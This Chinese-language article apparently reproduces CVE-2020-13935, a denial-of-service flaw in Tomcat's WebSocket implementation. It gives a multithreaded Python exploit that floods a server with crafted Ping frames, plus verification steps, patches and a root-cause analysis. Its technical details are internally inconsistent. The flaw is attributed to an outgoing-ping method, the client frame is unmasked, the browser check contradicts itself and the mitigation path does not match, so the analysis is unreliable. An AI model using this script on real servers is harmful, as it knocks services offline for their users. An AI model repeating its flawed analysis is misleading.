Apache Tomcat WebSocket拒绝服务漏洞的EXP复现是怎样的

# Apache Tomcat WebSocket拒绝服务漏洞的EXP复现是怎样的

## 漏洞概述

Apache Tomcat作为广泛使用的Java Web应用服务器，其WebSocket实现（RFC 6455）在特定版本中存在拒绝服务（DoS）漏洞（CVE-2020-13935）。当攻击者发送特制WebSocket帧时，可能导致服务器线程阻塞，最终耗尽资源无法响应正常请求。

## 影响版本
- Apache Tomcat 10.0.0-M1至10.0.0-M6
- Apache Tomcat 9.0.0.M1至9.0.36
- Apache Tomcat 8.5.0至8.5.56
- Apache Tomcat 7.0.27至7.0.104

## 环境搭建

### 准备工具
1. 漏洞环境：Tomcat 9.0.35（[官网下载](https://archive.apache.org/dist/tomcat/)）
2. 测试工具：Python 3 + `websocket-client`库
3. 监测工具：`jconsole`或`top`命令

```bash
# 安装WebSocket客户端
pip install websocket-client

启动漏洞环境

# 解压后启动Tomcat
cd apache-tomcat-9.0.35/bin
./startup.sh

EXP复现过程

漏洞原理

攻击者发送包含异常长负载的WebSocket Ping帧（超过125字节），导致Tomcat在WsRemoteEndpointImplBase.sendPing()方法中陷入无限循环，消耗工作线程。

Python EXP代码

import websocket
import threading

def exploit():
    ws = websocket.create_connection(
        "ws://localhost:8080/examples/websocket/echoStreamAnnotation")
    
    # 构造恶意Ping帧（长度>125字节）
    malicious_ping = b'\x89\x7e\x00\x7e' + b'A'*126  # 0x7e表示126字节长度
    
    try:
        ws.sock.send(malicious_ping)
        print("[+] 恶意Ping帧已发送")
    except Exception as e:
        print("[-] 发送失败:", e)

if __name__ == "__main__":
    # 多线程模拟并发攻击
    for i in range(20):
        threading.Thread(target=exploit).start()

攻击效果验证

1. 执行EXP脚本后观察Tomcat线程状态：

   # Linux系统监控
   watch -n 1 "ps -eLf | grep tomcat"
   

2. 通过jconsole连接Tomcat进程，可见大量线程阻塞在org.apache.tomcat.websocket.WsRemoteEndpointImplBase.sendPing方法

3. 正常WebSocket请求将无法响应：

   // 浏览器控制台测试
   const ws = new WebSocket('ws://localhost:8080/examples/websocket/echoStreamAnnotation');
   ws.onopen = () => console.log("连接失败（预期结果）");
   

修复方案

1. 官方补丁：

   • 升级至Tomcat 10.0.0-M7+
   • 升级至Tomcat 9.0.37+
   • 升级至Tomcat 8.5.57+

2. 临时缓解措施：

   <!-- conf/web.xml 添加限制 -->
   <security-constraint>
      <web-resource-collection>
          <url-pattern>/websocket/*</url-pattern>
      </web-resource-collection>
      <auth-constraint/>
   </security-constraint>
   

技术分析

漏洞根源在于WebSocket协议实现时未正确处理RFC 6455第5.5.2节规定： - Ping帧负载长度不得超过125字节 - Tomcat未验证长度直接进入循环处理 - 关键缺陷代码位置：

  // org.apache.tomcat.websocket.WsRemoteEndpointImplBase
  public void sendPing(ByteBuffer applicationData) {
      // 缺少长度校验...
      while (applicationData.hasRemaining()) {
          // 无限循环处理...
      }
  }

总结

该漏洞利用简单但危害较大，攻击者只需发送少量恶意数据包即可使服务不可用。建议企业及时升级Tomcat版本，同时可通过网络层限制WebSocket帧大小作为纵深防御措施。 “`

注：实际测试应在授权环境下进行，文中的EXP代码仅用于教育目的。